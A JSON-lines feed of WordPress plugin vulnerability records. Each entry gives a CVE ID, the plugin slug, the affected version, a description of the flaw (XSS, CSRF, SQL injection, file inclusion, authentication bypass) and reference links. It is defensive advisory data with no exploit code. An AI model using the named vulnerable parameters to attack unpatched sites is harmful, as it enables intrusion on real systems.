{"CVE_ID":"CVE-2020-36737","slug":"astra-import-export","versionImpact":"1.0.3","description":"The Import \/ Export Customizer Settings plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the astra_admin_errors() function. This makes it possible for unauthenticated attackers to display an import status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368366%40astra-import-export&new=2368366%40astra-import-export&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368366%40astra-import-export&new=2368366%40astra-import-export&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/194face3-36ac-4137-af9a-0b98f60e3afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/194face3-36ac-4137-af9a-0b98f60e3afb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5974","slug":"wpb-show-core","versionImpact":"2.2","description":"The WPB Show Core WordPress plugin through 2.2 is vulnerable to server-side request forgery (SSRF) via the `path` parameter.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0136057-f420-4fe7-a147-ecbec7e7a9b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0136057-f420-4fe7-a147-ecbec7e7a9b5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1382","slug":"nd-restaurant-reservations","versionImpact":"1.9","description":"The Restaurant Reservations plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the nd_rst_layout attribute of the nd_rst_search shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where an uploaded PHP file may not be directly accessible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d51db160-c701-426d-890f-73cc4785cad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d51db160-c701-426d-890f-73cc4785cad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-restaurant-reservations\\\/trunk\\\/addons\\\/visual\\\/search\\\/index.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-restaurant-reservations\\\/trunk\\\/addons\\\/visual\\\/search\\\/index.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9024","slug":"material-design-icons","versionImpact":"0.0.5","description":"The Material Design Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mdi-icon shortcode in all versions up to, and including, 0.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9979381e-711d-42c8-bfdf-4ee99e2e556f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9979381e-711d-42c8-bfdf-4ee99e2e556f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/material-design-icons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/material-design-icons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/plugin.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/plugin.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/js\\\/mdi-icons.js#L1311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/material-design-icons\\\/trunk\\\/js\\\/mdi-icons.js#L1311\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8915","slug":"category-icon","versionImpact":"1.0.0","description":"The Category Icon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/category-icon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/category-icon\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-icon\\\/trunk\\\/category-icon.php#L437\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-icon\\\/trunk\\\/category-icon.php#L437\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167148\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167148\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10227","slug":"affiliate-toolkit-starter","versionImpact":"3.6.5","description":"The affiliate-toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atkp_product shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86568f-dcdd-44fb-905a-9c5474f56515?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86568f-dcdd-44fb-905a-9c5474f56515?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-toolkit-starter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-toolkit-starter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174286\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174286\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/servit.dev\\\/\",\"name\":\"https:\\\/\\\/servit.dev\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11943","slug":"pgall-for-woocommerce","versionImpact":"5.2.2","description":"The ????? ?? ???? \u2013 ???? ?? ???? plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.2.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-pafw-admin-notice.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/class-pafw-admin-notice.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202085\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202085\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d85d609-781b-4f82-af57-124767f9d333?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d85d609-781b-4f82-af57-124767f9d333?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11900","slug":"portfolio-pro","versionImpact":"1.2.2","description":"The Portfolio \u2013 Filterable Masonry Portfolio Gallery for Professionals plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'portfolio-pro' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-pro\\\/trunk\\\/public\\\/class-portfolio-pro-public.php#L358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-pro\\\/trunk\\\/public\\\/class-portfolio-pro-public.php#L358\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1989fe85-5c32-4671-bd20-f9d05cb5034c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1989fe85-5c32-4671-bd20-f9d05cb5034c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12699","slug":"service-boxs","versionImpact":"1.9","description":"The Service Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216752%40service-boxs&new=3216752%40service-boxs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216752%40service-boxs&new=3216752%40service-boxs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/service-boxs\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/service-boxs\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6a65630-0852-4ffc-8c23-295be95bd7f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6a65630-0852-4ffc-8c23-295be95bd7f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1509","slug":"show-me-the-cookies","versionImpact":"1.0","description":"The Show Me The Cookies plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/show-me-the-cookies\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/show-me-the-cookies\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d15ceb-ab39-4088-a289-7244063aedf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d15ceb-ab39-4088-a289-7244063aedf8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12873","slug":"custom-field-manager","versionImpact":"1.0","description":"The Custom Field Manager WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e82d45f-7b8f-424e-a8d7-be64f5acf65e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e82d45f-7b8f-424e-a8d7-be64f5acf65e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4964","slug":"wp-online-users-stats","versionImpact":"1.0.0","description":"The WP Online Users Stats plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018table_name\u2019 parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-online-users-stats\\\/trunk\\\/admin\\\/class-wp-online-users-stats-admin.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-online-users-stats\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7ef66cf-ddf1-42be-82b1-cb6edcbf253c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7ef66cf-ddf1-42be-82b1-cb6edcbf253c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4666","slug":"wp-structuring-markup","versionImpact":"4.8.1","description":"The Markup (JSON-LD) structured in schema.org WordPress plugin through 4.8.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6d23f2f-9504-40da-9b71-189033d8bd1d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6d23f2f-9504-40da-9b71-189033d8bd1d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4369","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Content Injection in versions up to, and including, 18.2. This is due to lacking authorization protections, checks against users editing other's posts, and lacking a security nonce, all on the wpfm_edit_file_title_desc AJAX action. This makes it possible for unauthenticated attackers to edit the content and title of every page on the site.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c434e6b8-0dd5-4ffe-93b1-1af614c08f85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c434e6b8-0dd5-4ffe-93b1-1af614c08f85?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36736","slug":"cartflows","versionImpact":"1.5.15","description":"The WooCommerce Checkout & Funnel Builder by CartFlows plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.15. This is due to missing or incorrect nonce validation on the export_json, import_json, and status_logs_file functions. This makes it possible for unauthenticated attackers to import\/export settings and trigger logs showing via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368446\\\/cartflows\\\/trunk\\\/classes\\\/class-cartflows-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368446\\\/cartflows\\\/trunk\\\/classes\\\/class-cartflows-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d98c849-4178-4cee-846b-2c136bc56daf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d98c849-4178-4cee-846b-2c136bc56daf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3136","slug":"mailarchiver","versionImpact":"2.10.1","description":"The MailArchiver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce330cae-c2f8-42f3-822b-ca24bf46e433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce330cae-c2f8-42f3-822b-ca24bf46e433?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2937545\\\/mailarchiver\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2937545\\\/mailarchiver\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1506","slug":"bdthemes-prime-slider-lite","versionImpact":"3.13.1","description":"The Prime Slider \u2013 Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Fiestar widget in all versions up to, and including, 3.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044299\\\/bdthemes-prime-slider-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044299\\\/bdthemes-prime-slider-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4535","slug":"kkprogressbar","versionImpact":"1.1.4.2","description":"The KKProgressbar2 Free  WordPress plugin through 1.1.4.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4980886-da10-4bbc-a84a-fe071ab3b755\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4980886-da10-4bbc-a84a-fe071ab3b755\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2254","slug":"rt-easy-builder-advanced-addons-for-elementor","versionImpact":"2.2","description":"The RT Easy Builder \u2013 Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rt-easy-builder-advanced-addons-for-elementor\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/pricing-table\\\/template.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rt-easy-builder-advanced-addons-for-elementor\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/pricing-table\\\/template.php#L19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0316","slug":"wp-directorybox-manager","versionImpact":"2.5","description":"The WP Directorybox Manager plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_enquiry_agent_contact_form_submit_callback' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/directory-multipurpose-wordpress-theme\\\/10480929\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/directory-multipurpose-wordpress-theme\\\/10480929\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ee1f412-7555-4dec-ba59-49412471a42f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ee1f412-7555-4dec-ba59-49412471a42f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
